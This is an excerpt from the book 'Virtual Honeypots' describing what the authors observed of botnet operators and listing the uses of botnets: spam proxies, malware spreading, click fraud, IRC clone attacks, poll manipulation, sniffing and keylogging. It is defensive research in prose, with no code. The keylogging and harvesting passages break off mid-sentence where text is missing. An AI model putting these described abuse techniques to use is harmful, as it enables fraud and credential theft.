Virtual Honeypots: From Botnet Tracking to Intrusion Detection
The following is an excerpt from the book
Virtual Honeypots: From Botnet Tracking to Intrusion Detection. In this section of Chapter 11:Tracking Botnets (.pdf), authors Niels Provos and Thorsten Holz explain how virtual honeypots can be used in the real world to investigate botnets and their behavior.
Something that is interesting, but rarely seen is botnet owners discussing issues in
their bot channel. We observed several of those talks and learned more about their
social life this way. The bot-herders often discuss issues related to botnets but also
talk about other computer crime–related things or simply talk about what they do.
Our observations showed that often botnets are run by young males with surprisingly
limited programming skills. These people often achieve a good spread of
their bots, but their actions are more or less harmless. Nevertheless, we also observed
some more advanced attackers, but these persons joined the control channel
only occasionally. They use only one-character nicks, issue a command, and leave.
The updates of the bots they run are very professional. Probably these people use
the botnets for commercial usage and sell the services. More and more attackers
use their botnets for financial gain. For example, by installing browser extensions,
they are able to track/fool websurfers, click pop-ups in an automated way, or post
adware as presented in the previous section. A small percentage of bot-herders
seem highly skilled. They strip down the software used to run the C&C server to a
non-RFC-compliant daemon, not even allowing standard IRC clients to connect.
Moreover, the data we captured while observing the botnets show that these
control networks are used for more than just DDoS attacks. Possible usages of
botnets can be categorized as listed here. And since a botnet is nothing more than
a tool, there are most likely other potential uses that we have not listed.
Spamming: Some bots offer the possibility to open a SOCKS v4/v5 proxy —a
generic proxy protocol for TCP/IP-based networking applications — on a
compromised machine. After enabling the SOCKS proxy, this machine can
then be used for nefarious tasks such as sending bulk e-mail (spam) or
phishing mails. With the help of a botnet and thousands of bots, an attacker is
able to send massive amounts of spam. Some bots also implement a special
function to harvest e-mail addresses from the victims.
In addition, this can, of course, also be used to send phishing mails, since
phishing is a special case of spam. Also increasing is so-called stock spam:
advertising of stocks in spam e-mails. In a study we could show that stock
spam indeed influences financial markets.
Spreading new malware: In many cases, botnets are used to spread new bots.
This is very easy, since all bots implement mechanisms to download and
execute a file via HTTP or FTP. But spreading an e-mail virus using a botnet
is a very nice idea, too. A botnet with 10,000 hosts that acts as the start base
for the mail virus allows very fast spreading and thus causes more harm. The
Witty worm, which attacked the ICQ protocol parsing implementation in
Internet Security Systems (ISS) products, is suspected to have been initially
launched by a botnet because some of the attacking hosts were not running
any ISS services.
Installing advertisement addons and Browser Helper Objects (BHOs): Botnets
can also be used to gain financial advantages. This works by setting up a fake
website with some advertisements. The operator of this website negotiates a
deal with some hosting companies that pay for clicks on advertisements. With
the help of a botnet, these clicks can be automated so that instantly a few
thousand bots click on the pop-ups. This process can be further enhanced if
the bot hijacks the start-page of a compromised machine so that the clicks are
executed each time the victim uses the browser.
Google AdSense abuse: A similar abuse is also possible with Google's AdSense
program. AdSense offers companies the possibility to display Google
advertisements on their own website and earn money this way. The company
earns money due to clicks on these ads — for example, per 10,000 clicks in
one month. An attacker can abuse this program by leveraging his botnet to
click on these advertisements in an automated fashion and thus artificially
increment the click counter. This kind of usage for botnets is relatively
uncommon but not a bad idea from an attacker's perspective.
Attacking IRC networks:
Botnets are also used for DDoS attacks against IRC
networks. Popular among attackers is especially the so-called clone attack. In
this kind of attack, the controller orders each bot to connect a large number of
clones to the victim's IRC network. The victim is overwhelmed by service
requests from thousands of (cloned) bots.
Manipulating online polls/games: Online polls/games are getting more and
more attention, and it is rather easy to manipulate them with botnets. Since
every bot has a distinct IP address, every vote will have the same credibility as
a vote cast by a real person. Online games can be manipulated in a similar way.
Currently we are aware of bots being used that way, and there is a chance
that this will get more important in the future.
Sniffing traffic: Bots can also use a packet sniffer to watch for interesting
clear-text data passing by a compromised machine. The sniffers are mostly
used to retrieve sensitive information like usernames and passwords.
But the sniffed data can also contain other interesting information: If a
machine is compromised more than once and is also a member of more than one
botnet, the packet sniffing allows one to gather the key information of the other
botnet. Thus, it is possible to "steal" another botnet.
Keylogging: If the compromised machine uses encrypted communication
channels (e.g., HTTPS or POP3S), then just sniffing the network packets on
the victim's computer is useless, since the appropriate key to decrypt the
packets is missing. But most bots also implement functions to log keystrokes.
With the help of a keylogger, it is very easy for an attacker to retrieve sensitive
An implemented filtering mechanism (e.g., "I am only interested in key
sequences near the keyword 'paypal.com'") further helps in stealing secret data.
Harvesting of information: Sometimes we can also observe the harvesting of information
from all compromised machines. With the help of special commands,
the operator of the botnet can request a list of sensitive information from
With our method we can shut down the root cause of all of these types of
nuisances, and hence the preceding methodology cannot only be used to combat
To find out how the authors were able to make such observations about botnet behavior, read all of Chapter 11: Tracking Botnets (.pdf)
Reproduced from the book
Virtual Honeypots: From Botnet Tracking to Intrusion Detection Copyright , Addison Wesley Professional. Reproduced by permission of Pearson Education, Inc., 800 East 96th Street, Indianapolis, IN 46240. Written permission from Pearson Education, Inc. is required for all other users.
This was first published in October 2007